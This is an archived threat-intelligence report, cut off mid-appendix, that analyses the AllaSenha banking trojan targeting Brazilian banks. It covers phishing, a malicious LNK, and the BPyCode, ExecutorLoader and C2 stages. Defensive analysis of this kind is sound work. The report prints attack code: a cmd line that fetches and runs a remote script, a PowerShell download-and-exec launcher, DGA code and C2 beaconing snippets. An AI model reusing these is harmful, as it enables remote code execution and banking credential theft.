{
	"id": "4a12b9a9-212d-4e18-bf8d-b9d87bff5a75",
	"created_at": "2026-04-10T03:20:00.275543Z",
	"updated_at": "2026-04-10T03:22:17.766647Z",
	"deleted_at": null,
	"sha1_hash": "6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67",
	"title": "AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking details in Latin America",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2293868,
	"plain_text": "AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking\r\ndetails in Latin America\r\nBy Cyber Threat Research Team\r\nPublished: 2024-05-28 · Archived: 2026-04-10 03:00:28 UTC\r\nHome » Inside the Lab » AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking details in Latin America\r\nPublished on 28 May, 2024 29min\r\nIdentifier: TRR240501.\r\nSummary\r\nEarlier in May, our security product spotted a malicious payload, which was tentatively delivered to a computer in Brazil,\r\nvia an intricate infection chain involving Python scripts and a Delphi-developed loader.\r\nThe final malicious payload, that we named “AllaSenha”, is specifically aimed at stealing credentials that are required to\r\naccess Brazilian bank accounts, leverages Azure cloud as command and control (C2) infrastructure, and is another custom\r\nvariant of “AllaKore”1, an infamous open-source RAT which is frequently leveraged to target users in Latin America.\r\nThis report describes the specific infection chain that we encountered, provides associated indicators of compromise (IOCs),\r\nand presents the AllaSenha malware.\r\nInfection chain\r\nThe infection chain that we encountered (see Fig. 1) in May ends with the deployment and execution of AllaSenha. It starts\r\nwith a phishing email, leading to a malicious Windows shortcut file (LNK), which is disguised as a PDF file and distributed\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 1 of 14\n\nthrough WebDAV.\r\nFigure 1 – Overview of AllaSenha’s deployment steps, from infection to delivery\r\nWe could also identify likely previous variants of some of the described malicious tools, which were delivered in 2023,\r\nabusing public cloud hosting services (such as Autodesk A360 Drive or GitHub) to host malicious payloads. The final\r\npayloads were decrypted using the same techniques as the ones that are implemented by BPyCode (see later).\r\nFrom the various reliable chronological information we could obtain about the malicious LNK and the staging servers they\r\nwere served from, we believe with medium confidence that the attackers switched to the exact infection chain we describe in\r\nthis report starting March 2024.\r\nInfection vector\r\nThanks to cooperation, we could precisely identify a phishing email from which the infection chain that we describe started.\r\nWhile we cannot share the full content of this exact email, we retrieved several almost identical samples from late April\r\n2024, leading to the exact same infection chain and phishing website:\r\nFigure 2 – Example of a phishing email starting such infection chain\r\nThe phishing email impersonates a notification for an electronic invoice (“Nota Fiscal de Serviços Electrônica”11 or “NFS-e” in Portuguese), which appears to be frequent against targets in Brazil12\r\n, as such electronic invoicing process is common,\r\nand even mandatory in some circumstances since September 2023. The phishing email samples that we retrieved are all\r\nvisually very close, but the subject and exact content vary slightly, likely just enough to possibly defeat some elementary\r\ncontent-based spam filters. We identified the following subjects from retrieved email samples: NFS-e Emitida, Segue a NFe\r\ngerada, Nota Fiscal gerada, Nota Fiscal – \u003can identifier\u003e.\r\nMalicious emails contain a link to the is[.]gd link shortener (such as hxxps://is[.]gd/As1idV?0192524.3043 ), which\r\nredirects to a phishing website (see Fig. 3), hosted on a dedicated domain ( nfe-digital[.]digital ), through a URL\r\nmatching this pattern: hxxps://notafiscal.nfe-digital[.]digital/nota-estadual/?notafiscal=\u003can identifier\u003e\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 2 of 14\n\nFigure 3 – Example of a phishing website as displayed to the targeted users\nPhishing webpages include a button which links to a Windows search: protocol13 URL. The latter enables displaying files\nfrom a remote WebDAV server in a standard Windows Explorer window (see Fig. 4 in next title):\n[![Ícone de PDF](Nota%20Fiscal_files/pdf-icon.png)](search:query=NotaFiscal.pdf\u0026crumb=location:\\\\191.232.38[.]222@80\\Documentos\u0026displayname=Downloads) Malicious LNK\nIf a targeted user clicks the button on a phishing page, a standard Windows Explorer window is displayed to the user (see\nFig. 4), listing the files that are staged at the remote WebDAV path: a malicious LNK file which is poorly masqueraded as a\nPDF document ( NotaFiscal.pdf.lnk , SHA-256\n8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535 ), and a directory ( dc , which contains BPyCode\nlauncher, a malicious BAT file):\n\\\\191.232.38[.]222@80\\Documentos\\\n├── dc/\n│ └── c.cmd\n└── NotaFiscal.pdf.lnk\nFigure 4 – Malicious files from the WebDAV server as presented to the targeted user\nThe targeted user, lured into thinking a PDF invoice must be opened, is expected to execute the malicious LNK\n( NotaFiscal.pdf.lnk ). The LNK file in turn runs a Windows command shell, which creates and opens2 a fake invalid PDF\nfile ( NotaFiscal.pdf ) in the user’s Downloads folder, then triggers the download and execution of BPyCode launcher\n( c.cmd ):\n%windir%\\system32\\cmd.exe /min /c \"echo Indisponivel \u003e %userprofile%downloadsNotaFiscal.pdf\n\u0026 start %userprofile%\\downloads\\NotaFiscal.pdf\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\nPage 3 of 14\n\n\u0026 start /min cmd.exe /c \"\\\\191.232.38[.]222@80\\Documentos\\dc\\c.cmd\"\"\r\nWe could identify several similar additional WebDAV paths and malicious LNK files, which are all listed in Appendix.\r\nBPyCode launcher\r\nThe malicious LNK we described downloads and runs a malicious BAT payload ( c.cmd , SHA-256\r\n8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535 ), that we named “BPyCode launcher”, as part of\r\nits execution logic.\r\nBPyCode launcher merely launches a base64-encoded PowerShell command. The resulting PowerShell script downloads the\r\nPython binary from the official python.org website, and drops it to a created folder3, in the C:\\Users\\Public directory:\r\ncd $ENV:public\r\n$CP = ($env:COMPUTERNAME -replace \"-\",\"\") -replace \"DESKTOP\", \"\"\r\n$CP2 = -join ($CP[-1..-($CP.length)])\r\n$CP3 = $CP2.ToLower()\r\n$Folder2 = \"${ENV:public}\\$CP3\"\r\nif (!(Test-Path -Path $Folder2 -PathType Container)) {\r\n Invoke-WebRequest -URI https://www.python.org/ftp/python/3.10.0/python-3.10.0-embed-win32.zip -OutFile \"$CP3.zip\";\r\n Expand-Archive \"$CP3.zip\" -DestinationPath $Folder2;\r\n Copy-Item -Path \"$Folder2\\pythonw.exe\" -Destination \"$Folder2\\$CP3.exe\"\r\n}\r\n\u0026 \"$Folder2\\$CP3.exe\" -c \"\"\"import base64; exec(base64.b64decode('''''''''\u003cBASE64-ENCODED PYTHON SCRIPT\u003e''')); exit()\"\"\";\r\nThis PowerShell launcher uses the downloaded and renamed Python interpreter to further execute a base64-encoded Python\r\nscript, which we named “BPyCode”.\r\nStage 1 – BPyCode: a Python DLL downloader and loader\r\nBPyCode is a Python script that is in charge of downloading a DLL (“ExecutorLoader”), and executing it in-memory. The\r\nscript was decoded from base64 (by the BPyCode launcher script), and never written as a file, so providing a hash to\r\nidentify the exact BPyCode sample we analysed would not be relevant. However, BPyCode later writes a variant of itself as\r\na file (SHA-256 6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e ) during persistence setup – we\r\nlisted all identified BPyCode files hashes in Appendix anyway.\r\nBPyCode uses a domain generation algorithm (DGA) to generate a list of 3 hostnames (of the following pattern:\r\n\u003cDGA\u003e.brazilsouth.cloudapp.azure[.]com ), as well as a list of 10 TCP ports. BPyCode tries to download a payload from\r\none of the possible combinations of the generated hostnames and ports, and retries with additional combinations until it\r\nreceives data.\r\n# Hostnames generation algorithm from BPyCode\r\ndef lk():\r\n import hashlib\r\n from datetime import date\r\n try:\r\n d = date.today()\r\n wi = d.weekday()\r\n di = d.day + wi\r\n l = 'fghijlmnopqrstuvxzwkyjlmnopqabcghjlabcde'[di]\r\n r = []\r\n for _ in range(50, 61, 5):\r\n t = hashlib.sha1(f\"{di*wi*_}{l}{wi}{l}{d.month * di*_}{l}{d.year*di*_}\".encode()).hexdigest()*10\r\n r.append(t[:_].replace(t[:di], l).lower())\r\n return r\r\n except:\r\n return [f'google{di}']\r\nGenerated hostnames seem to match those that are associated with the Microsoft Azure Functions4 service, a serverless\r\ninfrastructure that in this case would allow operators easily deploy and rotate their staging infrastructure.\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 4 of 14\n\nThe protocol that is used to download from staging servers is raw TCP. Before waiting for server-emitted data, BPyCode\r\nsends an identifier ( pyCodeV10 - *NEWW* ) and some basic information about the targeted computer (host’s processor name,\r\nWindows version and current username):\r\nwith ss.socket(ss.AF_INET, ss.SOCK_STREAM) as s:\r\n s.settimeout(30)\r\n s.connect((f'{choice(lk())}.brazilsouth.cloudapp.azure.com', choice(ptV5())))\r\n s.send(f'pyCodeV10 - *NEWW* {ss.gethostname()} | {vs} | {pr}'.encode())\r\nThe data that BPyCode expects in return is a Pickle5-serialized dictionary which contains:\r\nan additional Python loader script to execute;\r\na ZIP archive which contains the “PythonMemoryModule”6 Python package, which is aimed at loading a DLL in-memory;\r\nanother ZIP archive which contains ExecutorLoader, a PE library.\r\nBoth ZIP archives are encrypted (ZipCrypto) with the same password: Snh2301**Snh2301** .\r\nThe additional Python loader script that is provided by the server is executed in-memory from BPyCode (via the eval\r\nPython function):\r\nit sets BPyCode persistence up, by writing a variant of a BPyCode script under C:\\Users\\Public\\\u003cfilename\u003e.txt\r\n(where \u003cfilename\u003e matches the folder name which is created by the BPyCode launcher3), and creating a registry\r\nrun key at HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\u003cfilename\u003e ;\r\nit decrypts and extracts downloaded ZIP archives in memory;\r\nit leverages the PythonMemoryModule to dynamically load ExecutorLoader in-memory, then runs its entrypoint (the\r\nexport named Force ).\r\nDuring our analysis, we tried to alter the identifier that is sent from BPyCode to the staging servers ( pyCodeXXX... ) before\r\ndownloading further data, and as a result we were able to obtain different payloads, but all match the delivery process that\r\nwe describe, and ultimately lead to AllaSenha.\r\nWe also noted that the password which is used to protect downloaded ZIP archives may be extensively reused by the threat\r\nactor, as we were able to decrypt older and publicly available payloads using the same one. Decrypting older payloads also\r\nyielded different AllaSenha samples.\r\nA last interesting detail is that BPyCode contains a sort of “killswitch” mechanism, as it will stop its execution in case the\r\ntargeted computer’s processor name contains Broadwell . Broadwell is an Intel microarchitecture that was discontinued in\r\n2018. The goal of this killswitch is not clear, but we speculate that this condition allows attackers to filter out appliances that\r\nare of no interest for the operators (the final payload being dedicated to workstations), or to avoid execution from some\r\nsandboxes we could not identify.\r\nStage 2 – ExecutorLoader: a simple Delphi-developed DLL loader\r\nFile name executor.dll\r\nCompilation time 2024-05-02 10:44:22\r\nHash (SHA-256) 99d0de52a63e5ff790e468dbb8cd0d5273b51ca3b67b5963c0bdedc3a4f44f12\r\nExecutorLoader is a Borland Delphi (10.4) developed DLL which exports a single function called Force . This DLL is\r\ndownloaded and executed in-memory by BPyCode, and is aimed at further decoding and executing the final payload (in our\r\ncase, AllaSenha) which is embedded as a resource. To do so, ExecutorLoader injects the payload into a (renamed)\r\nmshta.exe instance.\r\nThe Force function first copies the system’s mshta.exe binary to another file using a random name, under a directory\r\nchosen in a predefined list:\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 5 of 14\n\nFigure 5 – Random directory selection function\r\nExecutorLoader launches the copied binary using CreateProcessW , then loads one of its own resources (named RcDll )\r\nwhich holds a UPX-packed DLL (SHA-256 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841 –\r\nwhich in our case is AllaSenha). The mshta.exe process is opened, memory is allocated using VirtualAlloc and the\r\nloaded resource is copied inside this allocated region:\r\nFigure 6 – Function injecting the UPX-packed payload in mshta.exe\r\nA thread is then created inside the remote mshta.exe process, to run the final payload (AllaSenha).\r\nWe could identify some older versions of ExecutorLoader, distributed as an executable binary, called Execute_dll.exe\r\n(and usually stored in a ZIP file called Execute_dll.zip , which would be encrypted using the same password as the one\r\nused by BPyCode). The code of this executable is exactly the same as the described DLL version, except of course for the\r\nentrypoint. This executable version has notably been hosted on GitHub at\r\nhttps://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe .\r\nAllaSenha, an AllaKore RAT variant\r\nFile name N/A\r\nCompilation time 2024-05-02 10:44:07\r\nHash (SHA-256) 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 6 of 14\n\nThe final payload which is deployed from ExecutorLoader is a banking trojan that we named “AllaSenha”, and which is\r\ncomprised of a single Windows 32bits UPX-packed DLL (once unpacked using UPX 4.2.2, its SHA-256 is\r\nac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5 ).\r\nAllaSenha targets Brazil’s main banks, such as Sicredi, Itaú Unibanco, Caixa, Banco Brazil, or Sicoob and aims at stealing\r\npasswords, 2-factor authentication (2FA) tokens and QR codes.\r\nAllaSenha leverages Azure cloud as C2 infrastructure. It implement a DGA (in functions called GeraHost and GeraPorta\r\n– “Generate Host” and “Generate Port” in Portuguese), which generates a C2 hostname in the\r\n.brazilsouth.cloudapp.azure[.]com domain, as well as a port to connect to. AllaSenha DGA is different than the one in\r\nBPyCode, is based on the execution date, and may vary depending on the bank for which credentials are exfiltrated (one\r\nDGA modifier applies to Banco do Brasil only, another to Itaú Unibanco only). A reproduction of AllaSenha DGA is\r\nprovided in Appendix – as an example, nhefxgbdedndzhebcfedufbgkfecgbccfecgbcc.brazilsouth.cloudapp.azure[.]com\r\nis a C2 hostname which has been generated on 2024-05-27.\r\nJust like BPyCode, C2 communications between the malware and the server use raw ASCII text over a TCP socket. To\r\nhandle part of these communications, AllaSenha appears to include a Delphi open-source library called ServerSocket7,\r\nallowing basic RAT functionalities such as keyboard and mouse control, as well remote desktop capabilities. Interestingly,\r\nwhile AllaKore1 and ServerSocket do not seem to be directly related, both projects use the same name pattern for C2\r\ncommands ( \u003c|COMMAND|\u003e ), which may indicate that they are either often used in conjunction or inspired after one another.\r\nAll AllaSenha samples that we retrieved use Access_PC_Client_dll.dll as their original file name. This name can notably\r\nbe found in the KL Gorki8 project, a banking malware which seems to combine components of both AllaKore and\r\nServerSocket. As a result, we believe with medium to high confidence that AllaSenha is initially based on the KL Gorki\r\nsource code in particular.\r\nThe list of commands found in AllaSenha offer a glimpse of malware’s capabitities:\r\n\u003c|ASS-BLUE-PJ|\u003e\r\n\u003c|ASS-BLUE|\u003e\r\n\u003c|ASS-SANTA|\u003e\r\n\u003c|BB-AMARELO|\u003e\r\n\u003c|BB-AZUL|\u003e\r\n\u003c|BB-PASS6|\u003e\r\n\u003c|BB-PASS8|\u003e\r\n\u003c|BB-PROCURADOR|\u003e\r\n\u003c|BLOQUEAR|\u003e\r\n\u003c|CLOSEKEYBOARD|\u003e\r\n\u003c|DESCO-TKAPP|\u003e\r\n\u003c|DESCO-TKCHAVEIRO|\u003e\r\n\u003c|FECHAR-ANYDESK|\u003e\r\n\u003c|ITAU-SNH-CARTAO|\u003e\r\n\u003c|ITAU-SNH-ENTRADA|\u003e\r\n\u003c|ITAU-TK-APP|\u003e\r\n\u003c|ITAU-TK-CHAVEIRO|\u003e\r\n\u003c|ITAU-TK-SMS|\u003e\r\n\u003c|LIMPAR-TECLAS|\u003e\r\n\u003c|PRINCIPAL|\u003e\r\n\u003c|PUXAR-TECLAS|\u003e\r\n\u003c|QR-CONFIRMADO|\u003e\r\n\u003c|REQUESTKEYBOARD|\u003e\r\n\u003c|SAFRA-DADOS|\u003e\r\n\u003c|SENHA|\u003eAss:\r\n\u003c|SICOOB-HEIGTH|\u003e\r\n\u003c|SICREDI-TOKEN-CELULAR|\u003e\r\n\u003c|SICREDI-TOKEN-CHAVEIRO|\u003e\r\n\u003c|START-CAPTURA|\u003e\r\n\u003c|STN-6DG|\u003e\r\n\u003c|STOP-CAPTURA|\u003e\r\n\u003c|TAMANHO|\u003e\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 7 of 14\n\n\u003c|UNICRED-ASS|\u003e\r\n\u003c|UNICRED-TKN|\u003e\r\nUpon launch, AllaSenha reads the user’s browser data to search for credentials associated with targeted banks. If AllaSenha\r\nis unable to find any, it enters a “waiting” state in which it starts multiple threads to check if the user is performing actions\r\nassociated with banking. Actions that can get AllaSenha to leave its waiting state include Internet browsing to a targeted\r\nbanking website, the usage of the itauaplicativo.exe (from Itaú Unibanco) desktop application, or the saving of\r\npasswords associated with targeted banks in the browser password database. AllaSenha does not communicate with C2\r\nservers if it has not found data of interest.\r\nTo deal with 2FA, which is enabled on most banking websites, AllaSenha has the ability to display dedicated hijacking\r\nwindows requiring the targeted users to proceed with a second factor. Using the \u003c|TRAVAR|\u003e command, operators can\r\nfreeze user’s desktop with a fake bank security plugin load screen:\r\nFigure 7 – AllaSenha fake security plugin load screen\r\nWe believe this screen exists to give operators some time to interact with AllaSenha while trying to use stolen credentials for\r\ntransactions. Operators can then issue AllaSenha commands to display 2FA validation windows on targeted user’s desktop,\r\ndepending on the bank they are trying to connect to. For instance, operators can require a targeted user to validate an\r\noperator-initiated transaction by scanning a QR code, and entering a confirmation secret which would be provided by the\r\nBrasdesco mobile application (the QR code has been redacted in the following capture):\r\nFigure 8 – AllaSenha QR code-based hijacking window\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 8 of 14\n\nMultiple 2FA windows are available for operators to hijack tokens of different types, such as in-app tokens, SMS tokens and\r\nQR codes.\r\nInfrastructure\r\nThe threat actor most notably leverages the gd[.]is link shortener and dedicated domains as part of its phishing\r\ninfrastructure, as well as Azure cloud infrastructure as payload stagers and C2 servers.\r\nPhishing websites\r\nLinks in phishing emails leverage the is[.]gd link shortener to redirect to dedicated phishing domains. The malicious\r\nemail samples that we retrieved all ultimately lead to phishing URLs on those 2 hostnames: notafiscal.nfe-digital[.]digital , nota-fiscal.nfe-digital[.]top .\r\nHostnames resolves to Cloudflare IPs, but original content is likely hosted at HostGator Brazil14, as can be guessed from\r\nHTTP error pages that are displayed by phishing websites in case of an invalid URL. Associated domains were both\r\nregistered on the 2024-04-26 at Go Daddy, and set to use Cloudflare name servers.\r\nPivoting from the described characteristics, we identified 2 additional and similar domains that were registered on the 2024-\r\n04-25, and that we believe with medium confidence have been (or could be) used as part of a phishing infrastructure: nfe-digital[.]online , nfe-digital[.]site .\r\nStagers\r\nThe WebDAV server which delivered the malicious LNK in the case that we described ( 191.232.38[.]222@80 ) had been\r\nsetup the day before, and taken down the day after. This server only had a single HTTP server running on port 80, with a\r\ndefault Apache 2 index page. On this server, whose IP belongs to Microsoft (ASN 8075) and which is located in Brazil, a\r\n/Documentos directory containing a malicious LNK and a BPyCode launcher was staged.\r\nWe identified several other WebDAV paths matching Microsoft IPs in Brazil, which hosted both a NotaFiscal.pdf.lnk\r\nmalicious LNK file (all samples that we retrieved triggered the same actions than we described) and a malicious BAT\r\ndownloader:\r\nWebDAV path Hosted Malicious LNK (SHA-256)\r\nHosted\r\nBPyCode\r\nlauncher\r\nD\r\nW\r\nc\r\nm\r\n\\\\191.239.123[.]241@80\\Documentos\\ 46e754727efdc2c891319d25a67ee999a4d8a0b21b0113db08eead42cf51b780 files\\a3.cmd 2\r\n\\\\191.234.212[.]140@80\\Documentos\\ 2c53b4dc15882cf22772994d8ed0947e4a8b70aef3a12ab190017b3317c167ea files\\a3.cmd 2\r\n\\\\191.239.116[.]217@80\\Documentos\\ a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef files\\a3.cmd 2\r\n\\\\191.235.87[.]229@80\\Documentos\\ 1b4f44a00f61b3e0c8cd6c3125f03b6d4897d6ab90c8a6dc899ed96acee80dd6 dc\\c.cmd 2\r\n\\\\191.232.38[.]222@80\\Documentos\\ 8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535 dc\\c.cmd 2\r\n\\\\20.197.250[.]132@80\\Documentos\\ Unknown dc\\c.cmd 2\r\nWe could identify several additional WebDAV paths from malicious LNK samples, but we could not retrieve reliable\r\nchronological and exposed services information for the associated servers – they are all listed in Appendix.\r\nThe DGA function in BPyCode takes the current date as an argument to generate 3 distinct hostnames. We could determine\r\nthat associated generated hostnames were setup to deliver payloads daily. At the time of writing, the threat actor seem to\r\nhave stopped using *.brazilsouth.cloudapp.azure.com hostnames for payload delivery. The DGA methodology leveraged\r\nto connect to Azure-hosted (possibly “serverless”) infrastructure shows that the threat actor tried to automate the creation\r\nand rotation of its delivery infrastructure.\r\nC2 servers\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 9 of 14\n\nCommand and control servers were also hosted on Azure cloud infrastructure. As described in the sample analysis,\r\nAllaSenha also implements a DGA which ensures a daily C2 hostnames rotation. At the time of writing, newly generated\r\ndomains appear to be inactive, indicating that attackers may have either paused their activity, changed their C2 infrastructure\r\nor modified their DGA.\r\nAttribution\r\nWe could not reliably link the described activities to a known and consistently defined threat actor.\r\nYet the malicious files we analysed contained some clues that might be useful for attribution. The initial malicious LNK for\r\ninstance contained information about the computer from which the file was created:\r\nParsingPath: C:\\Users\\bert1m\\Desktop\\test.html\r\nFolderPath: C:\\Usuários\\bert1m\\Área de Trabalho\r\nMAC address: 94:53:30:e7:6f:42\r\nHostname: desktop-20a11ho\r\nWe can note that the local language of the computer on which the LNK file was generated is Portuguese ( C:\\Usuários\\ ) –\r\nthis is consistent with the targeting of AllaSenha (see below) and further language clues in BPyCode. AllaSenha samples that\r\nwe retrieved (for instance, SHA-256 278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400 ) also\r\ncontained unstripped source code paths using the same bert1m username:\r\nC:\\Users\\bert1m\\Desktop\\Meu Driver\\DELPHI XE5\\Cliente\\ZLibExApi.pas\r\nC:\\Users\\bert1m\\Desktop\\Meu Driver\\DELPHI XE5\\Cliente\\Conectar.pas\r\nThis suggests that a single individual going by the bert1m nickname could be responsible for the development of multiple\r\nparts of the infection chain, from infection to the final malware. This however does not necessarily demonstrate that the\r\ndeveloper is directly involved with the operation of such tools.\r\nWhen searching for the bert1m nickname, we were able to find several public social media profiles, 2 of them at least\r\nmatching Portuguese-speaking individuals, but could not reliably link any of those profiles further with any malicious\r\nactivity or files.\r\nTargets\r\nStrictly sticking to the infection chain that we described and the resulting AllaSenha samples, we could only (and reliably)\r\nidentify targets in Brazil. We do not benefit from enough contextual data to determine if individuals or organizations were\r\nspecifically targeted.\r\nBased on AllaSenha analysis, we can determine that the threat actor is specifically gathering credentials to access the\r\nfollowing banks:\r\nBanco do Brazil;\r\nBradesco;\r\nBanco Safra;\r\nItaú Unibanco;\r\nSicoob;\r\nCaixa Econômica Federal.\r\nConclusion\r\nThe ecosystem of cyber threats that specifically target Latin America9,10 is the home of peculiar malware samples and\r\nuncommon practices – but those are sometimes combined to well known infection or delivery techniques that are quite usual\r\nto the cybercrime landscape. Attackers keep regularly changing malicious infrastructure, infection methods and loaders to\r\nevade defenses, and while used techniques remain relatively simple, the lack of documentation and the determination of\r\nthese groups make them a real threat.\r\nThe threat actors that operate in Latin America appear to be a particularly productive source of cybercrime campaigns.\r\nWhile almost exclusively targeting Latin American individuals to steal banking details, these actors often end up\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 10 of 14\n\ncompromising computers that are indeed operated by subsidiaries or employees in Brazil, but that belong to companies all\r\naround the world. As a result, such threats should not be underestimated and require proper response, way beyond the\r\nBrazilian borders.\r\nAppendix\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\nf848c0f66afc7b5a10f060c1db129529a974ae0ad71a767f7c7793351bb7ca04|Malicious LNK (NotaFiscal.pdf.lnk)\r\nc300749ea44f886be1887b3e19b946efbdbbc3e1bf3e416c78cfbff8d23bf70a|Malicious LNK (NotaFiscal.pdf.lnk)\r\n0d94547a0b8f9795e97e2a4a58b0ece65b4ea4b6e6019cbc96e1c79f373b4587|Malicious LNK (NotaFiscal.pdf.lnk)\r\nd9877dc1ba0f977d100e687da59c216454d27e3988532652ac8f6331debbd071|Malicious LNK (NotaFiscal.pdf.lnk)\r\na6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef|Malicious LNK (NotaFiscal.pdf.lnk)\r\n21e22c4736e7567b198b505ed303c3ca933e0c2d931b886756f6db18a9884a75|Malicious LNK (NotaFiscal.pdf.lnk)\r\n2c1251ae1ec9d417bbbdd1f6ac99baa3f16a7639d0c12cb2883ef8c22c73e58e|Malicious LNK (NotaFiscal.pdf.lnk)\r\ne50bde1e319e699f587d3b5403c487e46deed61cc3f078fe951e7cb9f6896259|Malicious LNK (NotaFiscal.pdf.lnk)\r\nf00cb0603c055c85c7cdf9963d919d527b13013c182dc115ba733d28da57b1d9|Malicious LNK (NotaFiscal.pdf.lnk)\r\n2c53b4dc15882cf22772994d8ed0947e4a8b70aef3a12ab190017b3317c167ea|Malicious LNK (NotaFiscal.pdf.lnk)\r\n46e754727efdc2c891319d25a67ee999a4d8a0b21b0113db08eead42cf51b780|Malicious LNK (NotaFiscal.pdf.lnk)\r\ncd9f5773bd7672a3e09f2d05ef26775e8c7241879d5f4d13c5c5bc1704c49fa1|Malicious LNK (NotaFiscal.pdf.lnk)\r\n8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535|Malicious LNK (NotaFiscal.pdf.lnk)\r\n1b4f44a00f61b3e0c8cd6c3125f03b6d4897d6ab90c8a6dc899ed96acee80dd6|Malicious LNK (NotaFiscal.pdf.lnk)\r\n4546bc56c85ad2967859dc34b2c84f15891fcd192e86bfc630c49dc8d59e3e71|BPyCode launcher (c.cmd)\r\n40c37bfcc9b0e0d1b3840cb7c751162fec91fe833d4caf4a17bc8b97d53c88b5|BPyCode launcher (c.cmd)\r\na839dfbe1e7979dbd15ef6c5e472afb3efca044ee8ad27185b01161ce01e4f36|BPyCode launcher (a3.cmd)\r\n610f0ec33603ef4d1fd6530a8f6b0121a4c9cc62fb6fa2ceee8e2f5b2f866e4c|BPyCode launcher (a3.cmd)\r\nc0bf82a3f7807e0c88076e0d500b07e253b106914058b02e112d45eeb6209998|BPyCode launcher (a3.cmd)\r\n6f05d8f85384808036d3c77732b056e2b9cd429587a77b6be3ccdbd4bb558023|BPyCode launcher (a3.cmd)\r\n3962c8a4d0472f91d4be45140eccf661ad6c579319953156dec438dc6a07eeb2|BPyCode launcher (a3.cmd)\r\nb2e1f630c4593830ead91e7f3615d8d5214762dc5a1dd65bef7382d6f6c9f258|BPyCode launcher (a3.cmd)\r\n010d9f1f16c01db5ff37ff9b519d7ecf3be096e00ae597d7bec12b7099b2f852|BPyCode launcher (a3.cmd)\r\neb2cd71e72ff676d80eb746b961840fea3601d8f6402201d7c0e849a670240ee|BPyCode launcher (a3.cmd)\r\n643563613fb78f88fd90a6cf253ace9e9e6686568fdf6b6d7ec9760667d4d72b|BPyCode\r\nf2db799d892f2a7ac82bfa15826e74d778abdfa153ccafb9db1fdf56a0248a40|BPyCode\r\nd051c0aee007f2a1d0026330719a45e81c726251015837e66cf9348df3bd7210|BPyCode\r\ndd3f1829cc743942d1fc3719c8d8162bc45ca624352ac71f43c08dafd54bbb7f|BPyCode\r\n8a1aba66841ae4b20df95eea8a271538453a76a53596fd3254d47d4d57a3ab3a|BPyCode\r\n3b450994add1e3a206c56a7f8fd28e4132cffb27f3df345e07e8908d7989751f|BPyCode\r\n35329c2fb7a1844576a5defd5d9a7d250d78db51479b2612e3923e18539b0695|BPyCode\r\n19c02c5724622be4eedff95633f3fbaa604449aa50cc0761693bb8adb1e8cf97|BPyCode\r\n5782b9bc96ce5ad011c122496ff0ff0dc08d6444c6d2e98606ada82130d5f21a|BPyCode\r\n6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e|BPyCode persistence (C:\\Users\\Public\\\u003cfilename\u003e.txt)\r\n99d0de52a63e5ff790e468dbb8cd0d5273b51ca3b67b5963c0bdedc3a4f44f12|ExecutorLoader (executor.dll)\r\n3b0eb25ed6c0dff76a613bdcfd20ca1d2f482e3c1739747bf50834ca784e66bb|ExecutorLoader (executor.dll)\r\n19594c51c61fc5fd833ddd0eecb648acebdf4d789b337f00cda0a03efbb1afcf|ExecutorLoader (executor.dll)\r\n7e0051d9221c13a47245359a2cd2804b4d3d9302a321fc8085da1cf1a64bac91|ExecutorLoader (Execute_dll.exe)\r\nb8b3963967232916cd721a22c80c11cd33057bd5629dcfa3f4b03d8a6dbf1403|ExecutorLoader (Execute_dll.exe)\r\ne7aa64726783ec6f7249483e984ae20b31a091a488a3ed0f83c210702c506d20|ExecutorLoader (Execute_dll.exe)\r\n65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841|UPX-packed AllaSenha\r\nac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5|UPX-unpacked 